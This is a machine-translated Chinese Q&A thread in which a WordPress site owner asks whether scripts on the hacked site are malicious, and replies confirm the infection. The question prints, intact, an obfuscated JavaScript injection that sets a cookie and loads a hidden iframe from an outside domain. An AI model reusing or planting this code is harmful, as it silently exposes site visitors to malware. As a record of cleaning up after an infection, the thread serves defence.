2015-11-20 99 views
2

谷歌已经发现在我们的网站,我与 redleg检查它和一些值显示黄色恶意文件/恶意软件..恶意软件的网站hxxp看起来可疑

<div style=" display: none ;"> 
<input type="hidden" name="_wpcf7" value="41" /> 
<input type="hidden" name="_wpcf7_version" value="4.3" /> 
<input type="hidden" name="_wpcf7_locale" value="" /> 
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" /> 
<input type="hidden" name="_wpnonce" value="649583a56e" /> 
    </div> 

PS。我在这里改变我们的网站链接到我们的网站,为了保密和隐私

< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=52e4c650d67bb1484c4a926e5a0eccaf-2014.06.20'> </sc?ript > 
< sc?ript type='text/javascript'> 
/* < ![CDATA[ */ 
var _wpcf7 = {"loaderUrl":"http:\/\/ourwebsite.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; 
/* ]]> */ 
</sc?ript > 
< sc?ript type='text/javascript' src=hxxp://ourwebsite.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=52e4c650d67bb1484c4a926e5a0eccaf'> </sc?ript > 

有人能告诉我们,如果这些脚本的恶意看..

我是从我的所有.js文件

删除所有这个脚本什么
/*dd58e691432e362d70bf5b7534f31b87*/ 
var _0xacbd=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","","\x3D\x28\x5B\x5E\x3B\x5D\x29\x7B\x31\x2C\x7D","\x65\x78\x65\x63","\x73\x70\x6C\x69\x74","\x61\x64\x2D\x63\x6F\x6F\x6B\x69\x65","\x65\x72\x32\x76\x64\x72\x35\x67\x64\x63\x33\x64\x73","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x73\x74\x61\x74\x73\x2E\x62\x61\x6C\x77\x35\x65\x7A\x76\x69\x63\x7A\x37\x68\x6B\x61\x2E\x70\x77\x2F\x3F\x69\x64\x3D\x36\x39\x34\x37\x36\x32\x37\x26\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x26\x61\x64\x5F\x69\x64\x3D\x58\x6E\x35\x62\x65\x34","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x27\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x31\x30\x30\x30\x3B\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x3B\x6C\x65\x66\x74\x3A\x2D\x39\x39\x39\x39\x70\x78\x3B\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];window[_0xacbd[0]]=function(){function _0x78a6x1(_0x78a6x2,_0x78a6x3,_0x78a6x4){if(_0x78a6x4){var _0x78a6x5= new Date();_0x78a6x5[_0xacbd[2]](_0x78a6x5[_0xacbd[1]]()+_0x78a6x4);};if(_0x78a6x2&&_0x78a6x3){document[_0xacbd[3]]=_0x78a6x2+_0xacbd[4]+_0x78a6x3+(_0x78a6x4?_0xacbd[5]+_0x78a6x5[_0xacbd[6]]():_0xacbd[7])}else {return false};}function _0x78a6x6(_0x78a6x2){var _0x78a6x3= new RegExp(_0x78a6x2+_0xacbd[8]);var _0x78a6x4=_0x78a6x3[_0xacbd[9]](document[_0xacbd[3]]);if(_0x78a6x4){_0x78a6x4=_0x78a6x4[0][_0xacbd[10]](_0xacbd[4])}else {return false};return _0x78a6x4[1]?_0x78a6x4[1]:false;}var _0x78a6x7=_0x78a6x6(_0xacbd[11]);if(_0x78a6x7!=_0xacbd[12]){_0x78a6x1(_0xacbd[11],_0xacbd[12],1);var _0x78a6x8=document[_0xacbd[14]](_0xacbd[13]);var _0x78a6x9=983755;var _0x78a6xa=_0xacbd[15]+_0x78a6x9+_0xacbd[16];_0x78a6x8[_0xacbd[17]]=_0xacbd[18]+_0x78a6xa+_0xacbd[19];document[_0xacbd[21]][_0xacbd[20]](_0x78a6x8);};}; 
/*dd58e691432e362d70bf5b7534f31b87*/ 
+0

您的网站链接请 –

+1

前两个是来自联系表格7插件,没什么可担心的。第三个是不同的事情。按照http://codex.wordpress.org/FAQ_My_site_was_hacked –

+0

我编辑帖子,我迄今为止做的感谢 – FatalError

回答

1

我的防病毒(ESET端点安全5.0.2)检测以上的JavaScript var块代码作为木马病毒和拒绝,而我的杀毒软件启用加载这个页面。这是一个很好的标志,这确实是一个糟糕的代码块。

因此,要回答您的查询,是的,您发布的代码确实是恶意的。

0

哇,即使我的免费Avast通过阅读你的问题来检测恶意软件。

0

我下载反恶意软件的安全和蛮力防火墙,现在的威胁消失,但仍有剩余,但在其他的URL,这是

但是这两个只有页面重定向到主网页..

PS。我有清理之前存储在FTP上的备份,我应该删除它们吗?或者只要他们没有运行就可以了。

+0

我也试过clamAV,但它只扫描我邮件目录中的受感染文件,我应该删除它们吗? – FatalError

+0

如果其中存在病毒,请将其删除。像Thunderbird这样的东西通常会包含病毒元素,这些元素永远不会被用作代码块所关联的电子邮件,这些元素将被删除,但代码本身已经被删除。建议使用SFTP而不是直接FTP,这很容易破解。 – Martin

相关问题